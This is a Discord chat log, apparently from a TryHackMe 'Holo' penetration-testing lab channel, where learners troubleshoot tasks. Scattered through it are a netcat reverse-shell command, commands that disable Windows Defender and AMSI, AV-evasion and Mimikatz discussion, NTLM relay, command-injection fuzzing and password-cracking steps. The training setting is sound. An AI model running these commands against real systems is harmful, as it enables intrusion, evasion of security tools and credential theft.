#holo-network
It's modified per examples given in the links in the sections. Perhaps you could comment on depicted example not working
Are you even trying to be helpful? It's a requirement to modify it ..
Can you show me a screenshot of exactly where that code is
Because I’ve written the course and I’ve never seen that code before
nematode.
First code box section 31, it's obfuscated
But I was referring to the unmodified version of the second code box, which is depicted in the images of section 32
The image I supplied of my PowerShell terminal is what occurs
Otherwise I wouldn't have deviated in the first place
It's worth noting that amsitrigger does work as expected on the unmodified version of the first bypass from section 31
so then why not stick with it
I can’t help a lot if you’re jumping a bunch of places
so from my understanding the Powershell screenshot is of the BCsecurity bypass?
yes
@wind bobcat haelp I’ve never seen that error
why ? we can't get the domain admin without S-SRV02
we can
yes of course you can if you try Zerologon / Printnightmare which are not recommended. but personally I don't see how you can get a session with the remote ntlmrelay technique, the domain admin is supposed to connect to the FILE-SRV01 shares from the S-SRV02 machine, so if S-SRV02 is not operational you will not receive any SMB connection
well I can at least say it works. have tried it out myself
when did you try it ?
when it was released
I see, it seems to be a recent problem, at the time of the release S-SRV02 was operational
what's the problem with s srv02?
like if u are talking about the trust relationship issue it existed always
No it's not the trust relationship issue, S-SRV02 doesn't send SMB traffic to FILE-SRV01, I checked with wireshark, there is nothing, so I can't get a session with ntlmrelayx
not in that sense. the machine is operational, like I told you, reboot the network.
I already did
nothing has changed on SRV02 since release.
@sterile epoch have you ever seen this error
This link (https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/master/ASBBypass/Program.cs) in task 31 doesn't exist, pretty sure it's here (https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs) now
Pretty sure Rasta and Hubble are just messing with us at this point changing the directory structure every week
you could just link to the repo
the Rasta one is easy to find but the BC-Sec one is deep in there
Looks like defender might be blocking it. Then just updated a ton of detection stuff the last week or so
But if you use loadassembly from powershell it doesn't always tell you that it failed to load because of amsi. Sometimes you get errors like that
task 28 passing the leaked token via cookie seems not accepting, Can anyone give me a hint to make this?
hey anyone know how to escalate privileges in LSRV01
using docker
exploitation
Actually when i see for the SUID bit I got the docker and when I try to do it asks me a password
I tried both of the passwords that I found on the machine but they didn't work
you don’t need a password for the privilege escalation
you’re copy and pasting the command from GTFOBins without understanding it
can you explain to me how it's done?
well, for one, the first line is copying the docker binary to your current location and two it's setting the SUID bit
this is explained in the gtfobins page
and the last command is pretty easy to digest, you just need to read.
Yahh I Got it thanks man
Gave +1 Rep to @wind bobcat
Oh shoot, I was supposed to look at that
@wind bobcat I’m fairly busy with getting school sorted could you look at that?
TLDR just intercept and look at the JS
How do you turn off Windows Defender completely? I turned off real time protection but it’s still quarantining stuff on my test/dev vm.
registry foolishness
Need help on task 13. I have all subdomains in my hosts file and I discover the
What file is vulnerable to RCE and the param - but I just get a 404 when I try command injection.
shouldn't be /admin/
I tried that too, but I get a 302 redirect.
to inxed.php
*index.php
I can see the vuln param in the .php file
I'm at a loss at this point 😅
Like this?
that would be due to an invalid cookie
hello, just for clarification because I am redoing the network to gain more from it: task 12 says that we use LFI to bypass the 403 error, but in theory we don't include files, we read the file from the server to gain the creds to log in to the admin panel, so isn't it a directory traversal attack? thank you in advance
oh I forgot about that task
so in a way yes. You're using directory traversal as a part of LFI
hm yes exactly, but if it was an LFI we could get a shell from it, am I right? thank you
not really. You would have to chain other things to it to get RCE
It is an LFI exploit
but you're also using directory traversal through the LFI to read files
Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows.
correct
thank you!!!
you can also gain rfi through it
ay dios mio, building ThreatCheck, anyone done that?
thank you!
Gave +1 Rep to @livid shoal
can I ask for a nudge from someone who has done Task 29?
ok this is silly. My custom http profile is not changing the code one iota, threatchecker says so. Am I missing a step here? 1. set custom profile with the new headers 2. click generate stager 3. copy code of grunt 4. use threat checker?
ohhhk so yea it does change it (when you download the binary from covenant) but then you can't edit the grunt template (or can you) to get thru the next detections?
hey guys I need your help on mission 20. I've tried to find some SUID binaries and found docker. When trying to PrivEsc I noticed that I can't root the machine using the GTFOBins payload
The machine is not connected to the internet, hence I can't obtain root
any help please?
you can't just copy and paste the command
oh
as spooky said, you need to understand what it does and modify it
why doesn't it work with the right name (||u.....||) then?
can someone give me a hint what I could be doing wrong with the proxychains.conf?
I've set chisel up on attacker and target and done the proxychains.conf on attacker as described, but ping won't work (neither to .33 nor .1)
ping won’t work with proxychains, only sshuttle
you’ll need to use other methods of verification
iirc sshuttle doesn't carry icmp either
hey, so in the windows web server, we upload a payload and download and execute the stager to get a reverse shell. So I was writing this report. Can "Do not run web server with elevated privileges" be a possible solution? because the reverse shell gets us straight to nt authority. Is that right or will this always work no matter what user the web server is running as?
oh! ok thx! 🙂
okk.. ty
Gave +1 Rep to @wind bobcat
Morning all, is there anyone around who can point me in the right direction on the syntax required to put the AMSI bypass into the GruntHTTP stager binary? I now have a clean binary as checked by threatcheck.exe, after making changes to the listener profile and the GUID string builder in the C# template.
I'm in the position where my binary is not getting flagged by defender, but when I run it on a windows 10 VM I am getting "Illegal Characters in Path", I have followed RastaMouse's guidance to change the string builder in the executor - but I get the same error message with and without
I’ve been on this one task for more than a week but I have to say I have learned so much it is unreal. What a fantastic learning experience. The AV bypass stuff is super interesting. Does anyone know if there are any tutorial rooms that break down AV bypass techniques into smaller discrete sections?
You can add an exception for the folder where you store your binaries and powershell scripts. You can turn off AV in the local group policy editor and make a change in your registry, but it is much easier to create a folder for your test files and add that as an exception to Windows Defender. I then temporarily switch off real time protection and copy the binary from my host OS into that folder.
# disable scanning all downloaded files and attachments, disable AMSI (reactive)
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
# disable AMSI (set to 0 to enable)
PS C:\> Set-MpPreference -DisableScriptScanning 1
That does not disable it completely but good enough to proceed
That prevents privilege escalation on that machine but the attack is still there it doesn’t do anything about that
You don't. Well. I wouldn't recommend it. In theory you can add it to the beginning but that’s just going to be a pain. Just toss it into a file with the launcher code it generates. Also if you clean the code you don’t need an AMSI bypass really
It’s in the works
Could you send a screenshot of this?
yes but we wont get ntauthority then right?
Currently yes
But either way the attack is bad
I wouldn’t accept that as a valid mitigation
Cough cough check the filtering cough
yes yes I am writing about the filtering but was just thinking to add this too: if by any chance someone could bypass the filtering, they can't get administrative rights.
It would be a privilege mitigation but not an upload mitigation
right thanks
This is a copy of the GruntHTTP. However I get the same error message with GruntHTTP if I switch real time protection off to get it onto this VM.
And you don’t get that with a non modified grunt?
I would check over all your modifications again make sure you didn’t include anything weird that would cause that
So I get the same with the standard HTTP Grunt - I had to switch off real-time protection on the VM to get the binary on to the VM
I'll redownload Covenant and make sure I haven't accidentally changed something
@lone spruce one thing more, If I write in report that i disabled antivirus for mimikatz to run, would that be considered as a bad thing?
Yes
Reinstall, if it happens again open a GitHub issue
Then how can I not? like I tried everything, running mimikatz from memory. no matter what I do it always gets detected
Build your own custom mimikatz, check this : https://www.youtube.com/watch?v=9pwMCHlNma4&t=1590s&ab_channel=IppSec
I redownloaded Covenant, reset the HTTPGrunt stager code by copying from GruntHTTPStager.cs and then regenerated the Launcher to the same result. I'll look at raising an issue on github.
Just to be sure I rm'd my original installation entirely and started from scratch - same result.
hey but i just wanted to know that if i am using amsi bypass with Invoke-Mimikatz.ps1 file why does it still detect
like it shouldn't right?
because the amsi has already been bypassed?
like what i did in my earlier payload was creating a ps1 file and having amsi bypass in first half and reverse shell payload in second and it successfully executed that
It's so difficult to get Defender to not detect the file
I am doing this room for like the 10th time maybe but it just doesn't work without disabling detection. Even tried making a custom mimikatz but it always gets detected
or can we do something like using procdump to dump the lsass and use mimikatz locally ? will that be a good idea and not considered as loud?
clean mimikatz
AMSI bypasses aren't the end all be all, they are just one piece of the puzzle
oh ok. and what about dumping lsass and downloading it to the attacker machine. Procdump shouldn't be detected by windows most probably as it is signed software, or am I wrong?
https://github.com/cobbr/Covenant/issues/332 - Done, hopefully that is helpful.
Are you using HTTPS?
If I change it to http:// nothing loads
Try to disable also the Cloud Delivered Protection, not only the real time protection
Exactly the same result - thanks for the suggestion
Gave +1 Rep to @wise raft
yups covenant didn't work for me either. so I went with a simple powershell reverse shell
That's my next effort - thanks
Try this modified version of Covenant, It worked for me : https://gist.github.com/S3cur3Th1sSh1t/bf5935b5bff48f9f63bdbb4bcc9e8e3d, if you want to understand the details of the script, check this article (Covenant Section): https://s3cur3th1ssh1t.github.io/Customizing_C2_Frameworks/
@spark kayak I asked around. They suggest asking on the bloodhound slack
Thank you very much I will certainly look at that!
Gave +1 Rep to @wise raft
Thanks Cry. I’ve not used slack before, I’ll look into it.
Hi Manan - which powershell reverse shell did you use?
I have tried the alternate version of Covenant and interestingly had the same output with the Powershell as I did the binary payloads - real-time protection off. It was driving me insane and I wondered if there something wrong with my setup, so I tried a simple netcat connection to a listener on kali and then generated an msfvenom reverse shell - both of which worked fine. I'm going to give Powershell Empire a go.
Thanks man - I finally have a working powershell reverse shell on test VM that bypasses AMSI and Defender
Gave +1 Rep to @livid shoal
welcome :)
Guys, I have problems in task 37, I cannot authenticate with the user w----t and its hash. any ideas??
use rdp
:)
with password
I can't download the openvpn config, every time I try I get a 404
Why can't I run Procmon on the server?
because u dont
So how could the hijacking dll do?
download the exe running there
and test it on a
sandboxed
vm
ok, thanks !!
how can I download the openvpn config? every time I try to download the file I get a 404 not found error
On the Tryhackme website, in access
I can access the page but the download button doesn't work
I get the same error
After having put the dll in a path, how can I run the binary so that it loads the dlls again?
again u dont. its a scheduled task just wait for it
I waited 5 min and nothing
support team has been made aware
thm support team nimrod
You lost me
jabab
What does jabab have to do with a scheduled task
lol
try resetting the network. it should work. or maybe u doing something wrong.
@devout crater from the ss you sent, yes u are doing it wrong
just try making a google search about it
the very first url will help u
hey, are you guys also having problems with the vpn? it keeps d/c me every 4 minutes; don't we miss the keepalive in the *.ovpn?
ok, thanks bro !
Gave +1 Rep to @livid shoal
the VPN issues you dimwit
And can you DM me your oepnvpon output log
oieon
OpenVPN*
Please:)
sure right away
thanks @earnest hornet ! refreshing the *.ovpn from the THM site worked wonders!
Gave +1 Rep to @earnest hornet
S-SRV01 web-server seems down,
it can be pinged from L-SRV01 but the web server is not responding
Connection refused to the curl request
Can any one help me?
I am in the latter part of the room, so any help will be highly appreciated.
have u url encoded the curl command?
is anyone else having trouble connecting to admin.holo.live?
that's not a real hostname , is it?
Can someone who has done the hijacking dll help me?
Does anyone know if the expected answer for task 43, the vulnerable application is in scheduled tasks? Or did you use some other task?
do we have a smb-share in DC-SRV01 ?
does holo require much .net development? if so, can that be done from linux or does it pretty much require a windows dev box?
It does and it can be done through linux but you can't test anything
It does unless u can get some compiled binary from somewhere. Or if u wanna clean the c2, u can compile it again. But apart from that too, windows box is still required ahead at some point to test for dll hijacking.
Hey guys ... need help in uploading file in S-SRV01
hm. I was able to build a .net on linux in werath... I just don't know if the capabilities are on par. seems like I will set up a windows vm (SIGH) and try it both ways.
I need to set up the NTLM relay from the PC-FILESRV01 to the DC right? and not from S-SRV02 to the DC?
So in that case (from pc-file to dc), I will need to turn off SMB services on the PC-FILESRV01 right?
cause I actually tried by disabling smb on PC-FILE but wasn't able to start a socks proxy on the DC using ntlmrelay
u need a persistent connection to lsrv01 too
Submitting report for holo in like 5 seconds 👀
fingers crossed
and done!
omg
👀
@wind bobcat gib
you've been gave
woah I am the first?!?! wow thanks :)
Gave +1 Rep to @wind bobcat
Does L-Serv01 restart if it crashes? I was getting a response and not getting any response now. I've tried regen of vpn.
do anyone have the same issue with covenant thread pool starvation. ?
and then it overloads the vm
How do I compile Seatbelt for the server? I tried with various versions but it is still trying to download missing .net 3.5 (includes 2.0 ...)
Did it work? why would I put it there?
No it didn’t work, you shouldn’t put it in the desktop
How did you get it working?
Finally done. Whoop
well done
Finally done. Thank you all very much for the help provided !!
I'm having trouble with the /etc/hosts configuration
10.200.194.33 holo.live
is this ok?
I can't access vhosts but I can list them with gobuster
You'll need to add an entry for each that you find
So if you found test.box.thm then you'd need an entry for that
ohh ok! thanks!
When I try to logon to the S-SRV02 via rdesktop I get an error "The trust relationship between this workstation and the primary domain failed" is that intended?
it's not intended, it's technically a bug, it's an issue we can't fix
basically, even if you could logon to the device, you'd get kicked off in about half a second due to that device being starved for resources
So what can I do to end the room now? Switch to another subnetwork? (actually on the .69 net)
g'evening
Until when the report must be submitted?
Before 15 September iirc
I still can't download the openvpn file, I always get a 404
Is the timer of the scheduled task quite long? I managed to catch a shell once, I then disabled SMB rebooted but I'm not getting my shell back. I can log in as the user found earlier, all my poisoned dlls are present but they are not being triggered
hey everyone. I've been on this room for a couple weeks. spent a long time on av evasion and getting my binary to bypass detection. I'm now at the file upload stage and while I'm receiving a successful upload message, I haven't been able to find the location of the file. I'd appreciate help thanks
Hi shay - I dm'd you
Can someone help me please. I have redone task 47 about 6 or 7 times with slightly different combinations, but I cannot get authentication against the DC. I now have persistence on .35 I have reset the network about three times. I have not altered any passwords, but I did add an extra local account on .35. SMB was definitely off before I started ntlmrelayx.py.
Does anyone know if there is another way to get the last flag - I really want to put this to bed now.
how do you detect the missing dll via process hacker 2?
@wind bobcat can I dm you a question about holo network?
im very lost in the creating the amsi part 😩
you can post your question here
Think I figured out a way to authenticate to the broken S-SRV02 machine but if there is no other way other than ||NTLM-Relay|| to auth with the 02 machine, then I want to ask if I could be provided a valid set of creds so I can figure out if it would work or not.
@wind bobcat well I can't prove anything since I don't have valid creds to auth/pass/0r relay since the STATUS_TRUSTED_RELATIONSHIP_FAILURE Error.
you don't need to prove anything, this is me telling you that authentication to S-SRV02 will not work
I have like half a proof.
that's why I'm asking for creds to test my theory...
for the borked machine
can you give me the info to at least try?
the SAM database doesn't work
LSASS won't work due to the fact that it's not trusted by the domain controller
well I can get it to say creds invalid so idk
since the machine has been restarted since it has been cloned, no credentials are in the LSASS database
idk what you have tried
everything
it's a combination of the issue of resource exhaustion and a trust failure
if nothing works I gain nothing from having creds to test
I have done everything else
just want to answer this question.
I can't give it to you.
well then I can't test anything
How does one help make tryhackme better if they can't test anything
I myself am currently in the process of leaving THM in terms of content creation, so it's not my authority anymore.
ok
plus, proprietary scripts live on that machine so that's yet another reason that I can't grant access to the machine :p
the machine was deemed to add no value to the network.
@lone spruce I need your help may I dm you
coming to me when spooks said no isn’t going to change anything
again
no you may not
ok
There should no longer be any questions connected to that machine
there is no reason to attack it
I'm trying to improve my windows skills. I see something I just need help testing it since there is no way I could get it because of the STATUS_TRUSTED_RELATIONSHIP_FAILURE
the local admin account is the only way to gain access, since there's an issue with the SAM database, there isn't a way to access the local admin account.
We didn’t just pull the machine for no reason
You’re not going to fix that error. It’s broken as stated many times
AWS gods just said, nah
well idk what else to do. Other than soldier on alone.
@tardy idol I’m confused what you’re even trying to do? There is no relevance to that machine anymore
@lone spruce I guess that doesn't matter anymore.
Oh
I just read back over the conversation
we can’t just give you over machine creds
this has been looked over by a lot of people and we have concluded it is a deeper issue than it seems
It's ok just got excited over nothing.
@lone spruce is this a broken part of the network that should otherwise be functioning?
@wind bobcat
@signal lava I DMed you babes
kk
i just crashed s-srv01 server

is there a way to reboot it? it has only one vote
@zenith delta what sub net are you on?
@zenith delta if no one is there to reset you can add one vote every hour
im on 10.200.183.xx
okay
I'm on 186 I can't add a vote....
okay np
Morning everyone (just after 4am UK time), I was just wondering if there was anyone around who had a chance to look at my issue on the last but task?
I am failing to authenticate to the DC using ntlmrelayx
I have tried resetting the network a few times - I have followed the instructions to the letter but I just can't seem to get that last part. I am on the 192 sub.
type socks
when ntlmrelayx is running
if no socks route is created, you have to create one to the l-srv01 with sshuttle
ntlmrelayx.py -t 10.200.192.30 -smb2support -socks
sshuttle -r linux-admin@10.200.192.33 10.200.192.0/24 -x 10.200.192.33
so in order I join the VPN
run sshuttle
then get my metasploit shell from .35
run the ntlm relayx
and then add the portfwd in meterpreter
I can also run wireshark on .35 and see the refused authorisation
I bet I am doing something really stupid but for the life of me I can't work it out
@spark kayak if you run an nmap script scan against the DC does SMB signing return enabled or disabled?
enabled but not required
well double proxychains seems complicated 👀 sshuttle worked for me
literally type the word 'socks'?
don’t scan over sshuttle
yes
that’s dumb
but how would you do it with chisel then? double proxychains how?
You don’t need a double proxy for scanning
well, sshuttle worked for me dk if somethings weird for u? type socks in ntlmrelayx input field. u will know if even a socks relay is created or not
I'll give it a go thanks
socks
[*] No Relays Available!
is my syntax for sshuttle wrong?
sshuttle -r linux-admin@10.200.192.33 10.200.192.0/24 -x 10.200.192.33
in your command here, you don't have smb://10.200.192.30. Did you do that or no?
if that doesn't work, going down the list:
- Did you install these two packages? apt install krb5-user cifs-utils
- Are you using the latest version of impacket? If so, this might be a bug in the current version. It was tested on v0.9.22 and confirmed working.
I installed the first two packages. I'll give a different version of impacket a go. thanks
got the same result with smb://
[*] SMBD-Thread-11: Received connection from 127.0.0.1, attacking target smb://10.200.192.30
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[-] Authenticating against smb://10.200.192.30 as HOLOLIVE\SRV-ADMIN FAILED
socks
[*] No Relays Available!
ntlmrelayx>
thank you very much!
Gave +1 Rep to @wind bobcat
Of course it was god awful impacket
Thanks guys I'm so pleased. I have put a lot of time into Holo over the last couple of weeks but I have to say it has been an amazing learning experience. I feel like I learned so much from where I dead-ended myself and had to work my way back out. The AV bypass section is brilliant and I have to say I felt pretty ninja when my bypass worked. Thanks for everything again!
I added a couple of troubleshooting steps to the task @lone spruce
hololive openvpn still not downloadable 404 error
cc @earnest hornet
@clear zephyr Can you check the HoloLive VPN server please? :)
Hi ! I'm having some difficulties with task 10 : I can't find the file that leaks the server's current directory. I managed to answer the 2 other questions in the task though. I used gobuster to enumerate the files of the 3 subdomains with the -x parameter set to html,php,txt. Can someone tell me if I missed something please ?
you likely just overlooked it. It should definitely be in your scan results
if not, this is a file you should check anyways
Found it ! Thanks ! I feel kinda dumb as it's a thing i usually check ^^'
I'm having some problems with the vhost enumeration, could anyone assist with where I am going wrong please?
scrap previous I was being lame
hey
can anyone tell me what should I have to do with AV evasion
is it just a theory or I have to practice it on the machines ?
Hello people, I finally completed my report and wanted to send it in but my sub expired. Can anyone send the email where to mail?
Cry, how many submissions have there been?
dos
Tres by tonight
@lone spruce can I DM you something trivial?
Hey gang, just got the THM email and Holo sounds cool.
Where it says “subscribers only network “ is that just the regular £8 subscription or do you have to pay again just for the Holo network?
the standard thm vip sub
Thanks for replying 🙂 I’ll resub to check it out
Gave +1 Rep to @wind bobcat
didn't u win a sub
👀
in the giveaway
Gave +1 Rep to @livid shoal
lolllllll
I'll save it up for later as am taking sometime off Ctfs and focusing on completing all my pending projects
yeah
@woven lava btw I finally found a way to dump the creds
without getting
detected
:)
lol yea sure I'll too
Hey Cry/Sapuki can you just confirm if you got my mail, else my anxiety would go 
you sent something?
Yes, a report 👉 👈
I didn't get a report
LET ME HAVE MY FUN CRY
Lemme check
no szy
:(
just submitted my report 🙂
received
pulling my hair out with the rce fuzz in task 13 lol
make sure you use a valid cookie
so use the -b and add the phpsessionid for once I have logged in?
if that's what the particular syntax is for the tool you're using, then yes
may I dm you my syntax as I don't seem to be turning up much in the way of results lol
you can post it here
ok

||wfuzz -u http://admin.holo.live/dashboard.php?FUZZ=ls+-la -w /usr/share/seclists/Discovery/Web-Content/big.txt --hw 2||
syntax looks right, you're just missing the cookie
doh I copied the wrong text apologies wait a second
||└─# wfuzz -u http://admin.holo.live/dashboard.php?FUZZ=ls+-la -b PHPSESSID=j89rsbijtc59mdr9vdmhvptee4 -w /usr/share/seclists/Discovery/Web-Content/big.txt --hw 2||
converting markdown to pdf to your desired liking is a skill on its own imo
Network 10.200.69.xx needs a reset, L-SRV01 only comes up with ssh, no web anymore
And vote for reset is not within range...
remember to vote once per hour
yeah, only 25 to go now 😛
@wind bobcat Is there any faster way to reset?
@timid coral @river summit yes, by leaving the room and re-joining until you get assigned to a subnet that isn't for testing (like .69. is)
it got a lot of people assigned to it by mistake, if you get reassigned to another one, those won't have as many people
oo. forgot about that. thank you for reminding me
ahhh, nice thanks
cc @outer junco network range full?
thank you 🙂
Gave +1 Rep to @river cradle
Hi there ! I want some hints on task 40 . I still haven't found a way to execute Seatbelt.
I executed applock-bypas-check.ps1 and found some paths. But I tried them all and there is no way to execute the exe.
hihi cry
Scanning the webserver is telling my port 80 is closed, but the question is asking me what service is running on port 80 😐 Could someone give me a nudge in the correct direction
woah so many people sent reports lmao 😂 I thought the competition was not that hard
U will win 
I won't 
Is anyone available to assist with task 13 please?
Do we get like feedback on the report we submit? Albeit short bullet points of improvements to make, not like a teacher that reviews your assignment paper?
I have a minute or two, just ask the question here
curl -vvv --cookie "j89rsbijtc59mdr9vdmhvptee4" http://admin.holo.live/dashboard.php?cmd=whoami I am getting a 302
I am not sure what I am doing wrong here lol
I used -b $'PHPSESSID='"$PHPSESSID" for the session id, either way I think you need the PHPSESSID part to tell the server what it is
I will give that a go thanks
I actually did it in a browser with burp, then went to the history and copied the request as a curl command, then just turned the session id into an environment variable to run it as curl
but no reason you would need to do all that
The page is loading now correctly so deffo the right cookie command, just no whoami returned lol
oh bloody hell it was there the whole time
lol
thanks @timid coral
🙂
so was the term "PHPSESSID" required?
Yes, and the output was being put into the visitors today field on the page when rendered, I was expecting it to be returned in the response source like a lfi would, today I learnt lol
Cool 🙂
cmd=nc -e /bin/sh 10.50.XXX.XX 1234 HTTP/1.1 is not working I am positive it is because the command is being broken up in the request, any pointers?
is the holo god here
lol
ah i just copy pasted the rev shell command in a browser lol
is there anybody whose nmap scan is still showing the web port and sql port
url encode your spaces. s/ /+/g
on which subnet?
yea- not my subnet, sorry, cant answer
is yours working
About the only thing I can suggest without more information is to restart the network
Can i access holo even after my subscription ends and the room isn't completed?
no
Hi. According to the applock-bypas-check.ps1 script output, I enumerated it all with the following steps: first I check if the folder is writeable by my current account. Then I got one folder I can write files to. Then I copied the exe file to this folder and executed it. It prompts "Access is denied". It is the first time I try this technique, please tell me what I was doing wrong.
Awesome. I found that there is a reference. Now I understand it.
Anyone able to give me a small nudge. Task 8. I've tried multiple nmap scripts. I am not getting any ports open other than ssh. Is it user error? Or is something not working
nvm, today port 80 is showing up. I could not for the life of me get it to display last night
hard to know if it's user error without seeing your nmap command 🙂
you can just... leave the room and then join the room again
It's working now xD. The suggested scan. Then when I couldn't get it I tried a bunch of others. Today, just the regular scan works
I kinda feel like some of the .33 is... finicky... a bit unstable and can occasionally take a LONG time to come up
Like I gave it 20 minutes from a reboot earlier and didn't see it, so I went to bed and it was up later
xD no worries, I appreciate it! Most of the time it's user error (I'm a noob), good to know that isn't the case this time xD. I thought I had a basic understanding of nmap. Was confuzzled
Leave and reset both done but nothing fix
oh, I meant that'll fix the when the room expires part.
Access denied is not the same as cant run the exe. That means youre attempting to run/write to a directory you dont have permission to. You need to find a directory that is whitelisted and you have permission to write and execute within
Thanks. I have read the reference and the .ps1 script and learn how to bypass.
Gave +1 Rep to @lone spruce
holo... doesn't seem stable.
it seems like every time it expires and shuts down, it has troubling coming back up
Hi, what is the difficulty of Holo Network? I'm trying to decide between Throwback and this one
Holo IMO is harder than Throwback but Throwback is larger
thats literally out of our control. In all of our tests weve never seen that happen
Now when people think they need to throw an absurd amount of threads at the machine it shits the bed but that isnt on startup
I understand, but it is very frustrating.
Luckily for me tonight, the outage is exactly when I need to set up covenant
I THINK it happens when someone hits start before it's fully stopped. I think I'm going to get it 5 minutes after state changes to stopped in the future
I am having trouble connecting to the internal db in task 17, Im not asking for answer, just wanna run my syntax past someone who knows as its behaving odd
It was executing the commands however I could only see the output after typing exit.....how odd
If you're not in an interactive shell MySQL will act like you're passing in raw SQL queries from a file. Spawn an interactive session with python pty for example and it will show you a MySQL prompt @worldly spruce
Ah that was my thought, however everytime i try to spawn the python tty nothing happens
How are you trying to spawn it?
python -c 'import pty; pty.spawn("/bin/bash")'
Try python3 instead
ok
perfect thank you
Gave +1 Rep to @river cradle
w-data@1fd567f26ccb:/var/www/admin$ stty raw -echo;fg stty raw -echo;fg bash: fg: current: no such job
I'm using ZSH fyi
sooooo frustrating this network, I can only assume someone is breaking the admin login page with overzealous fuzzing?
~~what if u dont have to fuzz for it? ~~ I mean i didnt lol
I mean I am trying to grab a session cookie and can't even log in, keeps stalling on login to the dashboard lol
I think it is browser caching, I cleared cache and voila I got my login to work and cookie, now I am on task 18 wish me luck
Is there an issue with the network? I am unable to connect.
It's showing the initial access port closed, which was open yesterday. Any hints? If I am doing wrong?
Aah people nuking the server again?
so 1) your network is not the same as everyone's network. if you don't say which network you are on, I don't know if MY 10.200.X.33 being up means anything to you
- (and this is based on my assumptions) if the box expires and shuts down, give it 5 minutes to finish shutting down before restarting it.
I think, there is an issue with the network. Maybe someone has closed port 80 on the initial server.
It's not one network for everyone.
If you want to report an issue like that, please state the 3rd octet of your network IPs
Sure, it's not working on the 10.200.69.x/24 network.
that one, I am to understand, has an unintentionally heavy user-load
Hi ! Any hint for the FILESRV01 priv esc, can I PM? I am getting stuck on identifying the exploitable app.
Okay Okay. It worked a few minutes ago.
post it here what you think
Thats the message I get when I ask questions lol
for example....I am thinking I have forgotten something as I am trying to privesc on task 20 and don't have the password for www-data to perform the initial priv esc lol
Anyone help with my quandary above ^^ lol
for zsh
- get a shell.
- python3 -c "import pty; pty.spawn('/bin/bash')"
- control z
- stty -a and find rows columns
- stty raw -echo;fg
- press enter twice
- stty rows your_rows columns your_columns
- export TERM=your term
ah I meant my other question lol, I am trying to priv esc on L-SRV01, got the binary I need to exploit but I dont seem to have the www-data password...have I missed something previously?
u never have www-data password
:)
yes
also till the pc file srv01 everything is well explained in the tasks
hey can anyone give me the hunch for the post exploitation task in SRV01
specifically for the cme
I get that, however the specific priv esc requires sudo being run as a prereq
Being a noob again.. Any ideas why gobuster isn't giving me any output once it completes. User error, or is it because the webserver keeps crashing?
suggested script, using suggested wordlist
AH crap, alright, ty.. Never used wfuzz before. At least somewhat familiar with gobuster. I will give that a shot
@nocturne rover would this be -u <IP> .... -H "Host: <IP>"?
FUZZ.<IP>
I think I got it working. Web Server keeps crashing and timing out after a few minutes tho 😦 I limited my threads. Hololive is too popular I think xD
ty, I did it right. Need to work on it when not so many people are on I think
wfuzz -u <IP> -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<IP>"
Limited threads with gobuster
not wfuzz, Ill try it again
Gotcha, really appreciate the help! Honestly too much of a noob to be trying an entire network, but..... It looked interesting
ex.
wfuzz -u https://TryHackMe.com -w /usr/share/SecLists/... -H "Host: FUZZ.tryhackme.com" -hc....
ty!
I got it running. Cheers fellas 😄
Ill share the loot when I win this! lol
Anything wrong here? wfuzz -u 10.200.69.33 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404 -H "Host: FUZZ.10.200.69.33"
Anyone know if ill be able to use the attack machine to work through the holo network? Can't use my pc to connect to the network atm and don't want my access expiring
@hasty galleon Yeah you should be able to - I'm pretty sure it will even have your access configuration in it as well already.
Oh yeah you're right on that. Thanks appreciate it.
np
cry whats happening with the finals tasks about relay? why no traffic comes?
Wish I could help, Im stuck on enumeration xD
set the timeout super high. see if that gets it done
i have like 5 days stuck on the msi i dont know where to start
i would pay someone to help me
Anyone able to tell if 10.200.69.33 is up? Nmap scan is showing it as down and not sure if its me doing something wrong.
Everyone on the 10.200.69.X network please be patient we’re investigating an issue with AWS currently
cry does the ntlmrelay works? or not
in the final tasks
thank you in advance because i had troubles
Why wouldn’t it
i use sshuttle and correctly use responder to listen on my tun0 interface and still nothing happens
If you’re using responder then you didn’t fully read the tasks
A temporary mitigation is in place. If you’re in the 10.200.69.X network please leave the room and rejoin using the pinned link
cry I was on the 69 network connected using the attack machine. Restarted my machine to connect to the new network but now when i try to run the openvpn command i get Options error: In hololive.ovpn:1: Maximum optione line length (256) exceeded
regenerate your conf file
I have tried, getting 404-An error occured, or a cloudflare error 502
try go in to the room and leave it, then rejoin the room and regenerate
Did manage to get the file once but the content of the file is just the tryhackme 404 error html
Nah no luck still
what network are you on in holo?
10.200.68.0
i guess you need to wait for answer... from some tech ppl then 🙂
Fair enough, thanks for trying 🙂
@earnest hornet config 404
reeee
reeee
@clear zephyr Hey, this user is having a Holo VPN 404 issue 🙂
Does the report have a length limit?
It's not VS Code, it's full visual studio
is it not from one of these?
go for 2019, community is free to use
Thanks much!
Gave +1 Rep to @river summit
No, didn’t you already submit yours though?
Actually think I’m thinking of someone else
completed the network finally onto the report what a network for real
Currently working on it and pandoc is failing me. Did a test convert with the editor I'm using and got over 100 pages kekw
Probably Thinking of something else. Almost done with the core documentation....
After installing, windows 11 acting strange. Not opening applications, not showing taskbar etc
i dont run win11 so i have no experience with it, but i cant see anyone complain about win11 and vs2019
cant seem to get anything to work, does no help the task manager too
have you rebooted?
i have no idea why vs would mess up, maybe you need to restore
yeah but cant seem to find the restore option
try to boot up in safe mode, press F8 on boot from bios
100 pages!!!!!!! thats a lot
👀
what did u write so much ? lmao
Didn’t do much even in safe mode.
Re installation is prolly the best
yeah, you need a working machine... but i searched a bit and can't see anyone reporting problems
Funny thing is I never made a backup image too
Using deployment image servicing and management tool
Still nothing 😦
😣
Thanks @river summit for helping me!
Gave +1 Rep to @river summit
np
Any help for Task 22? collabcat is not working.
unshadow /etc/shadow and /etc/passwd ... awk 'length < 11 && length > 9' rockyou.txt > rockyou-10.txt ... and crack it with john, save you time
Thanks.
Gave +1 Rep to @river summit
well, if I can't reach ||10.200.169.33|| does it mean i have to reset the network - or just wait until its lifetime ends?
I've tried in the morning and it was ok
yep it's a long one. What format would you like the report in?
well that's for u to decide. I sent mine in pdf But broo 👀 100 seems too huge
